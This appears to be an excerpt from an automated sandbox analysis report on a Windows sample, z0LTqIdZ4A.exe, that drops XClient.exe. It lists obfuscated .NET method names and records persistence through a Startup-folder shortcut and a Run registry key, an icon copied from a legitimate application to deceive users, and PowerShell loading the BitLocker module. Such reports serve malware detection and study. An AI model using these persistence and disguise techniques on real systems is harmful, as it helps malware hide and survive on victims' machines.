Source: z0LTqIdZ4A.exe, ieCQIKQt2mfBYxuPYhLc0vTAOhelEk1gxcOFOOCbloTxyrDhY3am3nvLcWd.cs	High entropy of concatenated method names: 'nx8yvWbhW1XyH090g9xIMfjXDhdIDK5koRETJnksBdPqJpOBoJiKJ9kDQLe', 'a5e70ZjU9phk0IB0WfZWMrSHFxRD9qkluAZYJKUhl7vGJv9IgACUldjF2iSVMKr8olFkY6wqMJmRn6QRFF5QAI0fzlp6d9', 'P1E5qd0RSekz5vw4uTJqR3Fm6BrUGCv9s1uGR5ZuftowSmTsoxURjfHmRFttwKjr09lSJkVaVj5XpGybSxAOcSptTS9FWe', '_5VjJuCNV4pGvT6zzeNqesZatIs8w6aVg0AM6qD6I8bWBqbSPuem45aPrgHRqAR8JOzHKacS1Cbysy074u5QIYgntPxLZ1h', 'zHaUESWs4ICLpUjBfOBG9iLziYVdcrqtyJ4GZnLSW9IACygjbLsgWY1AOBE7QiMt0WJcUIsjhd7M461no9B50Jvd6IGawS'
Source: z0LTqIdZ4A.exe, 5J1ZtgxCAORpQkKfbtyjcdbtZuAbZbGkrUTzcLOjmFUgTWwxjCJihLKlHta.cs	High entropy of concatenated method names: 'jGOiNwXKcCUHbjAmgGwWJ25S9WpyL5yECMdvC1mSCPdKc0gtzgijt9gtDH6', 'yTyRcpP61NMMYdztKvxV1P2CwSHb4wGNO7RK6', 'Xa5mi41HYsZhMsbWqOLANA42vQCKB2MhAi2AZ', 'x5hXxjFXjIZHtE2a6sNvy6GSZgaC4jU44oJEg', 'IR8FyEZLWCxiNRpRsjgA5tNirkl3Sp5JNfFPX'
Source: z0LTqIdZ4A.exe, clLfMovJ7EyWpP1YZLBn4SpCUCHKawgTDSn01nJ9Jt.cs	High entropy of concatenated method names: 'lHQ7HiHXKE6RA0X7An1c7cnCQWLHoT77AiEc51skmF', 'rBxBER1TeceHQnzWaBSjBXCadIgIvO9FSpK7sA2TMu', 'iNOlvpQKMo2TzdxkU8keK3ymmLR', 'cbmi2Tp83TkjTgHENGvOjZwTXuN', 'ZdnJ1rHFIrpK0EwDtKNtyxZqUds', 'bdKZzqDe9vwcSKnUMg4yvqofmb5', 'd4DURcBmRkb44jVb3iD3QPBZPKL', 'pQKtIvWQQL5n5Bf6YEYRW6AzoeR', '_7xyFN4tg6zY3BXXUF7rsBMbGaaG', '_3dJEmBF32EKTbhaomnkyFmhUw7x'
Source: z0LTqIdZ4A.exe, FWRVlnv4XcpasXXo7IOR0TB6xv5rI8sG3n1JujIWyNdRChDND8mxCw0zOYQ.cs	High entropy of concatenated method names: 'Hn1l5kKothHG6BXsN9ajvJOZE4zKnDYVrdywBJfXIJbVuIWh8YpAg4pmEYs', 'zVgtGnkn5yIcJwGKAaHInHxDPhgBZ3IditMEvfCHtDiaAWFkPz7rf0C067f', 'n4JFwpfGRy94BqrNqCGE14tojuMKUX13EQWC7', 'beHrmA2CoOCJQ8BNNFyKofhLEvoobOx50YXji', '_4TRJ8xUga0dTalXLLIfPba0q301E8NEAh9lUq', 'qTiHitHElGSFcRh1gDV81VBubmBBBXQBrKwNL'
Source: z0LTqIdZ4A.exe, 7xFtXXU3s75cBzZ83vBR56aYu7QOPMwlacDWA0hEYm.cs	High entropy of concatenated method names: 'shJkE5VH79Nldz0EbzGw9pOyBLhff67yzPO64jgonI', 'U9y8FYsKdb62tXAWWEDOZIzyhNqqca7BVtYBHuG3Mq', 'm01Fqtej8FqgSTvSpbA7pepno5cjCTdhjU7Kk9HyPO', 'rh7G2vRfampssywhoTNcrEBLWNXNNgRFo5JMlUGngL', 'ZisvlU0Kb89PgHIgSi7EkSD8pG0qFoNhRfXy8BofnC', 'dyiHRHwShUHid4ZIF8b2hCCDuRiK4DzB1orcgnwJos', 'I3b5Pgbq87qYjXQFUQs', '_9f1dcFLn7U1Khy7W4zj', 'fNdcSiac352kQ2I65FC', 'dCqaEgCLiLrnkg2MdkA'
Source: XClient.exe.0.dr, IvE5nCV3nYLNULOm9h9lh8FE60P5fkYMEivyKE3fKLBdX.cs	High entropy of concatenated method names: '_3wkkvZc3ILzxfnGVWgQaM5dy7OOOv8l1uSQ5HPD0yNnOX', 'gOT9kMGIRQEqQQQhJyHXw4Wnw4pERGp8Oh1Zp6rr0lRmk', 'g57injr5JLMCuzd3lAncm78uqqtKiEFXw7aWyFnOIh9PX', 'aDDZEfJiRZTfjMgU0KCTRs9fJdZLBRzO1lKr8scmpoL1HG8Ko0245x', '_5c6vvPDQdiAUF0zBRNrYpH8IxeGCijltY8cHeqbGmX0ExTpI7rpgYQ', 'Lja9TjCBR3FFEl8JAfCUpBPf21zU7QULk8dbCPPlwtbbfePcdXDKzh', 'DMRt2ZPXdMgJrvBwkmsPthRQd01GWMKXyGOlWAfgl8wyj8095dx31E', 'jH0slgldyl3ffYd3UuCBHHfLP0AZsReyYcRaLJ1cl7gruzD1SWyIco', 'uRgPZAoqJ8BXUqmw70ZTOOHQ0ler0azlNzH8o2WlqZjDxGzmvnUQzI', 'nTqYw71CwhCt53vMN7nAdAnITIVpcwtLYurj6wE3FpzR8c8DtBGh8A'
Source: XClient.exe.0.dr, DU364AQJ3HN1eTkTyIG4haISJOO3fiP4Qbs2GuUKzx.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'qMMcYRZL5W5EWn0PQb3sDwATsKYtjOdiJptPQIaULlhWnxDXg0QaWvjZQBD2z8ptI4xSWFbazxbMG', 'CqmQBJBADvxs3OqNVGGsZ5oNJkrNufDExczkfLGgPDWtXepOwg7Hz2si14ucSHgzDmo12017qiBCd', 'Md4jj8Ljlou73br0jl07P1qwmNTwroCVB3AKH7OusXNekwBYpnPe13cOFKv5xFLldEAbUVOkARUkk', 'IbhYZXRHWtZQXcNseoLOaB5hdsFHboCJV38jr5czy6wNrzkWpDVq7jYr2Pr4vWfQUwT19QBxodRNn'
Source: XClient.exe.0.dr, 699hB8OpAkzLHY74ohXhmfCMlX15Hp2AJaZBoeZWB2xFbrRKHMzCVubFaJI.cs	High entropy of concatenated method names: '_8BAhZLu0bagKwDnyy5VPbTkx9J5uVCOuQ4glO3NDfxskIBg4AQF2b5hMIrz', 'TkwO5hTgqQrmhzgpAKuNR3yGNfwdq0TZV36Fxh5DAmU4lWCkscr4Rn4SEJ7', '_3enrPWsbY3nj8vOIZUS6yHxjAB5GOsGA8VQuNCBiRcakhzXMifU3IvcthuY', 'lCGJLbMUDi4FHKmEbCsUnzDJN1UckCi0qp25Xmdd5knch7HRmlJnmfhMOA7', 'eKxoN90V33AKT7jn4lYiWc8zdNBzOgqxScNGUVEC0ORg8iiIxYbCr7x0uCs', 'GUOEc0bV0XFaLXrIqG2sZcK4oDhckCWF3GN7kWNLEIuU3ATAOLt3KEjXWDX', 'KSRQYL2ynnIKyhfKyhoRiDgXwiDGRrhbFOaBWLe6L9itpynAfWLBWL9YugZ', 'YELbu4ZDtIalBSu6GmeHUd6CJhaCtLI7j5DgfRVOWQCSOUKOFa1FxdH02kX', 'HEXR6yxmKpT05rUCBeXb7K3aBbQq73v6pffdXCBYubcFULYzraBa6a0YQ0V', 'oCqgLU9qsZgITmHn4c0ZphaDqlhCPx8nbOwtNDfrTRQlBNhPU6TkOUuXPsc'
Source: XClient.exe.0.dr, d3LcwH2oCXS1LNcyJ6jdVni2ZBk.cs	High entropy of concatenated method names: 'YhaQpleqbqctVxubr3dGI5kcHYW', '_6qTIUO76p0rGPnaifJ5N8qe4El8', 'zWbsUS6rt1G2D4709g5wkNJvYnS', 'BW9yCMsV7kkFRLlrHlNGg8hYYZr', 't4BcSaxt7gdOu3MtLrVtM73FkvT', 'ykhouKtPf2ZVFGVYSFO80qDPCjR', 'codwjAI7zDoOD5ZIpJ5Ve4LWBqw', '_0Otaxz2bEZBMYT6fyPHJpXMRYD6', 'aZnrFrNfIB3J8wL92fxkDd7HdSX', 'RoTtAfwANIVrXqPYy5VnhIs4Hgc'
Source: XClient.exe.0.dr, s5SbpqXq8zLP8EdiRwmo3WoZE4GaMKOwbQLylyOoFElpkMcOZvuOEE6LgcL.cs	High entropy of concatenated method names: 'gzWbMVqyjFIlrsGLrx64gbIH4mhiudqxbJAojsbeeS8nrdNcj3LctxAHRNE', 'VzwKjASLTrfd5tINXRi5mcquj9dF8ruAf4beTfBMCe6OQciTWraF4BgWd1l', 'X8UvH5VTAbUa9P3LzcYysHDerrs1pwmAgLrPmMCIJpUG5jEeVrRny0ERADY', 'BLSbs6FoYIG222pjkpJz6SA93G85cPD0D6inwMZZdlabl7afMNyWufhWZyX', '_2cVeB9gLkUaSPGeRvW7FPfghTossGPEvr99zF', 'RFnHzaT5z4xTUbV9XFYfeyJ8SsCZSuk81MX5J', '_5gXiLU4gC9RYYkOF53bkA6cbnDcFnSYyiNrid', 'ahrWXr0eZ7mEdTrZmKNdP9I6o3fUeaMSqqT7L', 'gcq8YVX8YkJfKigRm15FKra2ZJo4NoSEJ7Elb', 'dEtTzlGmKbxnYpbxQ9KjqHeOeaA1nEUbsCnzV'
Source: XClient.exe.0.dr, gbzJjhDKIEAJEh9vZeIt06VVbEcLfda4VLlKKKxltiHCXQlUC6MTsAiz1AS.cs	High entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'IcdXS9ik8uzbLFXKdjcloxYmBrnIs2boOF5Noclgm2DBn7HEFYNECHL5kzW', 'DSNwvOHsm7zQHPm9khYthdiIWoBgY61UKxhSu6zCoao8KD3yC7iM1ySmUgPJdYNzJD2Rd3LcyzfjS5qwg6Xg3Yf5rLB4oy', 'f2mK5YtlyB7amB6EBaZgUHKQmEnbDz6K6uiWLEwldKfuJLaHbH1vpaBRKw9WKtpoC8XHZz7mLXYxNzKiXOQMJqhrgZzeWZ', 'aAoQValFbp84BzzfcfeuMgT0xBMvKTFCUsrsGLiiK80ak51sbUrFmqf3LTbpeKvmGnVwiLQZ1ngT3811PgqhSwG222W0Bf', 'scm6acwoZsD2NeogRXgQBz88NmPOPgvJzUeUP618e10iLo66cxogrBoarm0IBWk7tnQdTkz78bZLovLzABsnP9LUoQMOwo'
Source: XClient.exe.0.dr, ieCQIKQt2mfBYxuPYhLc0vTAOhelEk1gxcOFOOCbloTxyrDhY3am3nvLcWd.cs	High entropy of concatenated method names: 'nx8yvWbhW1XyH090g9xIMfjXDhdIDK5koRETJnksBdPqJpOBoJiKJ9kDQLe', 'a5e70ZjU9phk0IB0WfZWMrSHFxRD9qkluAZYJKUhl7vGJv9IgACUldjF2iSVMKr8olFkY6wqMJmRn6QRFF5QAI0fzlp6d9', 'P1E5qd0RSekz5vw4uTJqR3Fm6BrUGCv9s1uGR5ZuftowSmTsoxURjfHmRFttwKjr09lSJkVaVj5XpGybSxAOcSptTS9FWe', '_5VjJuCNV4pGvT6zzeNqesZatIs8w6aVg0AM6qD6I8bWBqbSPuem45aPrgHRqAR8JOzHKacS1Cbysy074u5QIYgntPxLZ1h', 'zHaUESWs4ICLpUjBfOBG9iLziYVdcrqtyJ4GZnLSW9IACygjbLsgWY1AOBE7QiMt0WJcUIsjhd7M461no9B50Jvd6IGawS'
Source: XClient.exe.0.dr, 5J1ZtgxCAORpQkKfbtyjcdbtZuAbZbGkrUTzcLOjmFUgTWwxjCJihLKlHta.cs	High entropy of concatenated method names: 'jGOiNwXKcCUHbjAmgGwWJ25S9WpyL5yECMdvC1mSCPdKc0gtzgijt9gtDH6', 'yTyRcpP61NMMYdztKvxV1P2CwSHb4wGNO7RK6', 'Xa5mi41HYsZhMsbWqOLANA42vQCKB2MhAi2AZ', 'x5hXxjFXjIZHtE2a6sNvy6GSZgaC4jU44oJEg', 'IR8FyEZLWCxiNRpRsjgA5tNirkl3Sp5JNfFPX'
Source: XClient.exe.0.dr, clLfMovJ7EyWpP1YZLBn4SpCUCHKawgTDSn01nJ9Jt.cs	High entropy of concatenated method names: 'lHQ7HiHXKE6RA0X7An1c7cnCQWLHoT77AiEc51skmF', 'rBxBER1TeceHQnzWaBSjBXCadIgIvO9FSpK7sA2TMu', 'iNOlvpQKMo2TzdxkU8keK3ymmLR', 'cbmi2Tp83TkjTgHENGvOjZwTXuN', 'ZdnJ1rHFIrpK0EwDtKNtyxZqUds', 'bdKZzqDe9vwcSKnUMg4yvqofmb5', 'd4DURcBmRkb44jVb3iD3QPBZPKL', 'pQKtIvWQQL5n5Bf6YEYRW6AzoeR', '_7xyFN4tg6zY3BXXUF7rsBMbGaaG', '_3dJEmBF32EKTbhaomnkyFmhUw7x'
Source: XClient.exe.0.dr, FWRVlnv4XcpasXXo7IOR0TB6xv5rI8sG3n1JujIWyNdRChDND8mxCw0zOYQ.cs	High entropy of concatenated method names: 'Hn1l5kKothHG6BXsN9ajvJOZE4zKnDYVrdywBJfXIJbVuIWh8YpAg4pmEYs', 'zVgtGnkn5yIcJwGKAaHInHxDPhgBZ3IditMEvfCHtDiaAWFkPz7rf0C067f', 'n4JFwpfGRy94BqrNqCGE14tojuMKUX13EQWC7', 'beHrmA2CoOCJQ8BNNFyKofhLEvoobOx50YXji', '_4TRJ8xUga0dTalXLLIfPba0q301E8NEAh9lUq', 'qTiHitHElGSFcRh1gDV81VBubmBBBXQBrKwNL'
Source: XClient.exe.0.dr, 7xFtXXU3s75cBzZ83vBR56aYu7QOPMwlacDWA0hEYm.cs	High entropy of concatenated method names: 'shJkE5VH79Nldz0EbzGw9pOyBLhff67yzPO64jgonI', 'U9y8FYsKdb62tXAWWEDOZIzyhNqqca7BVtYBHuG3Mq', 'm01Fqtej8FqgSTvSpbA7pepno5cjCTdhjU7Kk9HyPO', 'rh7G2vRfampssywhoTNcrEBLWNXNNgRFo5JMlUGngL', 'ZisvlU0Kb89PgHIgSi7EkSD8pG0qFoNhRfXy8BofnC', 'dyiHRHwShUHid4ZIF8b2hCCDuRiK4DzB1orcgnwJos', 'I3b5Pgbq87qYjXQFUQs', '_9f1dcFLn7U1Khy7W4zj', 'fNdcSiac352kQ2I65FC', 'dCqaEgCLiLrnkg2MdkA'
Source: 0.2.z0LTqIdZ4A.exe.12be9ac0.0.raw.unpack, IvE5nCV3nYLNULOm9h9lh8FE60P5fkYMEivyKE3fKLBdX.cs	High entropy of concatenated method names: '_3wkkvZc3ILzxfnGVWgQaM5dy7OOOv8l1uSQ5HPD0yNnOX', 'gOT9kMGIRQEqQQQhJyHXw4Wnw4pERGp8Oh1Zp6rr0lRmk', 'g57injr5JLMCuzd3lAncm78uqqtKiEFXw7aWyFnOIh9PX', 'aDDZEfJiRZTfjMgU0KCTRs9fJdZLBRzO1lKr8scmpoL1HG8Ko0245x', '_5c6vvPDQdiAUF0zBRNrYpH8IxeGCijltY8cHeqbGmX0ExTpI7rpgYQ', 'Lja9TjCBR3FFEl8JAfCUpBPf21zU7QULk8dbCPPlwtbbfePcdXDKzh', 'DMRt2ZPXdMgJrvBwkmsPthRQd01GWMKXyGOlWAfgl8wyj8095dx31E', 'jH0slgldyl3ffYd3UuCBHHfLP0AZsReyYcRaLJ1cl7gruzD1SWyIco', 'uRgPZAoqJ8BXUqmw70ZTOOHQ0ler0azlNzH8o2WlqZjDxGzmvnUQzI', 'nTqYw71CwhCt53vMN7nAdAnITIVpcwtLYurj6wE3FpzR8c8DtBGh8A'
Source: 0.2.z0LTqIdZ4A.exe.12be9ac0.0.raw.unpack, DU364AQJ3HN1eTkTyIG4haISJOO3fiP4Qbs2GuUKzx.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'qMMcYRZL5W5EWn0PQb3sDwATsKYtjOdiJptPQIaULlhWnxDXg0QaWvjZQBD2z8ptI4xSWFbazxbMG', 'CqmQBJBADvxs3OqNVGGsZ5oNJkrNufDExczkfLGgPDWtXepOwg7Hz2si14ucSHgzDmo12017qiBCd', 'Md4jj8Ljlou73br0jl07P1qwmNTwroCVB3AKH7OusXNekwBYpnPe13cOFKv5xFLldEAbUVOkARUkk', 'IbhYZXRHWtZQXcNseoLOaB5hdsFHboCJV38jr5czy6wNrzkWpDVq7jYr2Pr4vWfQUwT19QBxodRNn'
Source: 0.2.z0LTqIdZ4A.exe.12be9ac0.0.raw.unpack, 699hB8OpAkzLHY74ohXhmfCMlX15Hp2AJaZBoeZWB2xFbrRKHMzCVubFaJI.cs	High entropy of concatenated method names: '_8BAhZLu0bagKwDnyy5VPbTkx9J5uVCOuQ4glO3NDfxskIBg4AQF2b5hMIrz', 'TkwO5hTgqQrmhzgpAKuNR3yGNfwdq0TZV36Fxh5DAmU4lWCkscr4Rn4SEJ7', '_3enrPWsbY3nj8vOIZUS6yHxjAB5GOsGA8VQuNCBiRcakhzXMifU3IvcthuY', 'lCGJLbMUDi4FHKmEbCsUnzDJN1UckCi0qp25Xmdd5knch7HRmlJnmfhMOA7', 'eKxoN90V33AKT7jn4lYiWc8zdNBzOgqxScNGUVEC0ORg8iiIxYbCr7x0uCs', 'GUOEc0bV0XFaLXrIqG2sZcK4oDhckCWF3GN7kWNLEIuU3ATAOLt3KEjXWDX', 'KSRQYL2ynnIKyhfKyhoRiDgXwiDGRrhbFOaBWLe6L9itpynAfWLBWL9YugZ', 'YELbu4ZDtIalBSu6GmeHUd6CJhaCtLI7j5DgfRVOWQCSOUKOFa1FxdH02kX', 'HEXR6yxmKpT05rUCBeXb7K3aBbQq73v6pffdXCBYubcFULYzraBa6a0YQ0V', 'oCqgLU9qsZgITmHn4c0ZphaDqlhCPx8nbOwtNDfrTRQlBNhPU6TkOUuXPsc'
Source: 0.2.z0LTqIdZ4A.exe.12be9ac0.0.raw.unpack, d3LcwH2oCXS1LNcyJ6jdVni2ZBk.cs	High entropy of concatenated method names: 'YhaQpleqbqctVxubr3dGI5kcHYW', '_6qTIUO76p0rGPnaifJ5N8qe4El8', 'zWbsUS6rt1G2D4709g5wkNJvYnS', 'BW9yCMsV7kkFRLlrHlNGg8hYYZr', 't4BcSaxt7gdOu3MtLrVtM73FkvT', 'ykhouKtPf2ZVFGVYSFO80qDPCjR', 'codwjAI7zDoOD5ZIpJ5Ve4LWBqw', '_0Otaxz2bEZBMYT6fyPHJpXMRYD6', 'aZnrFrNfIB3J8wL92fxkDd7HdSX', 'RoTtAfwANIVrXqPYy5VnhIs4Hgc'
Source: 0.2.z0LTqIdZ4A.exe.12be9ac0.0.raw.unpack, s5SbpqXq8zLP8EdiRwmo3WoZE4GaMKOwbQLylyOoFElpkMcOZvuOEE6LgcL.cs	High entropy of concatenated method names: 'gzWbMVqyjFIlrsGLrx64gbIH4mhiudqxbJAojsbeeS8nrdNcj3LctxAHRNE', 'VzwKjASLTrfd5tINXRi5mcquj9dF8ruAf4beTfBMCe6OQciTWraF4BgWd1l', 'X8UvH5VTAbUa9P3LzcYysHDerrs1pwmAgLrPmMCIJpUG5jEeVrRny0ERADY', 'BLSbs6FoYIG222pjkpJz6SA93G85cPD0D6inwMZZdlabl7afMNyWufhWZyX', '_2cVeB9gLkUaSPGeRvW7FPfghTossGPEvr99zF', 'RFnHzaT5z4xTUbV9XFYfeyJ8SsCZSuk81MX5J', '_5gXiLU4gC9RYYkOF53bkA6cbnDcFnSYyiNrid', 'ahrWXr0eZ7mEdTrZmKNdP9I6o3fUeaMSqqT7L', 'gcq8YVX8YkJfKigRm15FKra2ZJo4NoSEJ7Elb', 'dEtTzlGmKbxnYpbxQ9KjqHeOeaA1nEUbsCnzV'
Source: 0.2.z0LTqIdZ4A.exe.12be9ac0.0.raw.unpack, gbzJjhDKIEAJEh9vZeIt06VVbEcLfda4VLlKKKxltiHCXQlUC6MTsAiz1AS.cs	High entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'IcdXS9ik8uzbLFXKdjcloxYmBrnIs2boOF5Noclgm2DBn7HEFYNECHL5kzW', 'DSNwvOHsm7zQHPm9khYthdiIWoBgY61UKxhSu6zCoao8KD3yC7iM1ySmUgPJdYNzJD2Rd3LcyzfjS5qwg6Xg3Yf5rLB4oy', 'f2mK5YtlyB7amB6EBaZgUHKQmEnbDz6K6uiWLEwldKfuJLaHbH1vpaBRKw9WKtpoC8XHZz7mLXYxNzKiXOQMJqhrgZzeWZ', 'aAoQValFbp84BzzfcfeuMgT0xBMvKTFCUsrsGLiiK80ak51sbUrFmqf3LTbpeKvmGnVwiLQZ1ngT3811PgqhSwG222W0Bf', 'scm6acwoZsD2NeogRXgQBz88NmPOPgvJzUeUP618e10iLo66cxogrBoarm0IBWk7tnQdTkz78bZLovLzABsnP9LUoQMOwo'
Source: 0.2.z0LTqIdZ4A.exe.12be9ac0.0.raw.unpack, ieCQIKQt2mfBYxuPYhLc0vTAOhelEk1gxcOFOOCbloTxyrDhY3am3nvLcWd.cs	High entropy of concatenated method names: 'nx8yvWbhW1XyH090g9xIMfjXDhdIDK5koRETJnksBdPqJpOBoJiKJ9kDQLe', 'a5e70ZjU9phk0IB0WfZWMrSHFxRD9qkluAZYJKUhl7vGJv9IgACUldjF2iSVMKr8olFkY6wqMJmRn6QRFF5QAI0fzlp6d9', 'P1E5qd0RSekz5vw4uTJqR3Fm6BrUGCv9s1uGR5ZuftowSmTsoxURjfHmRFttwKjr09lSJkVaVj5XpGybSxAOcSptTS9FWe', '_5VjJuCNV4pGvT6zzeNqesZatIs8w6aVg0AM6qD6I8bWBqbSPuem45aPrgHRqAR8JOzHKacS1Cbysy074u5QIYgntPxLZ1h', 'zHaUESWs4ICLpUjBfOBG9iLziYVdcrqtyJ4GZnLSW9IACygjbLsgWY1AOBE7QiMt0WJcUIsjhd7M461no9B50Jvd6IGawS'
Source: 0.2.z0LTqIdZ4A.exe.12be9ac0.0.raw.unpack, 5J1ZtgxCAORpQkKfbtyjcdbtZuAbZbGkrUTzcLOjmFUgTWwxjCJihLKlHta.cs	High entropy of concatenated method names: 'jGOiNwXKcCUHbjAmgGwWJ25S9WpyL5yECMdvC1mSCPdKc0gtzgijt9gtDH6', 'yTyRcpP61NMMYdztKvxV1P2CwSHb4wGNO7RK6', 'Xa5mi41HYsZhMsbWqOLANA42vQCKB2MhAi2AZ', 'x5hXxjFXjIZHtE2a6sNvy6GSZgaC4jU44oJEg', 'IR8FyEZLWCxiNRpRsjgA5tNirkl3Sp5JNfFPX'
Source: 0.2.z0LTqIdZ4A.exe.12be9ac0.0.raw.unpack, clLfMovJ7EyWpP1YZLBn4SpCUCHKawgTDSn01nJ9Jt.cs	High entropy of concatenated method names: 'lHQ7HiHXKE6RA0X7An1c7cnCQWLHoT77AiEc51skmF', 'rBxBER1TeceHQnzWaBSjBXCadIgIvO9FSpK7sA2TMu', 'iNOlvpQKMo2TzdxkU8keK3ymmLR', 'cbmi2Tp83TkjTgHENGvOjZwTXuN', 'ZdnJ1rHFIrpK0EwDtKNtyxZqUds', 'bdKZzqDe9vwcSKnUMg4yvqofmb5', 'd4DURcBmRkb44jVb3iD3QPBZPKL', 'pQKtIvWQQL5n5Bf6YEYRW6AzoeR', '_7xyFN4tg6zY3BXXUF7rsBMbGaaG', '_3dJEmBF32EKTbhaomnkyFmhUw7x'
Source: 0.2.z0LTqIdZ4A.exe.12be9ac0.0.raw.unpack, FWRVlnv4XcpasXXo7IOR0TB6xv5rI8sG3n1JujIWyNdRChDND8mxCw0zOYQ.cs	High entropy of concatenated method names: 'Hn1l5kKothHG6BXsN9ajvJOZE4zKnDYVrdywBJfXIJbVuIWh8YpAg4pmEYs', 'zVgtGnkn5yIcJwGKAaHInHxDPhgBZ3IditMEvfCHtDiaAWFkPz7rf0C067f', 'n4JFwpfGRy94BqrNqCGE14tojuMKUX13EQWC7', 'beHrmA2CoOCJQ8BNNFyKofhLEvoobOx50YXji', '_4TRJ8xUga0dTalXLLIfPba0q301E8NEAh9lUq', 'qTiHitHElGSFcRh1gDV81VBubmBBBXQBrKwNL'
Source: 0.2.z0LTqIdZ4A.exe.12be9ac0.0.raw.unpack, 7xFtXXU3s75cBzZ83vBR56aYu7QOPMwlacDWA0hEYm.cs	High entropy of concatenated method names: 'shJkE5VH79Nldz0EbzGw9pOyBLhff67yzPO64jgonI', 'U9y8FYsKdb62tXAWWEDOZIzyhNqqca7BVtYBHuG3Mq', 'm01Fqtej8FqgSTvSpbA7pepno5cjCTdhjU7Kk9HyPO', 'rh7G2vRfampssywhoTNcrEBLWNXNNgRFo5JMlUGngL', 'ZisvlU0Kb89PgHIgSi7EkSD8pG0qFoNhRfXy8BofnC', 'dyiHRHwShUHid4ZIF8b2hCCDuRiK4DzB1orcgnwJos', 'I3b5Pgbq87qYjXQFUQs', '_9f1dcFLn7U1Khy7W4zj', 'fNdcSiac352kQ2I65FC', 'dCqaEgCLiLrnkg2MdkA'

Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe

File created: C:\Users\user\AppData\Roaming\XClient.exe

Jump to dropped file

Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Jump to behavior

Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Jump to behavior

Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient			Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: icon (2112).png

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
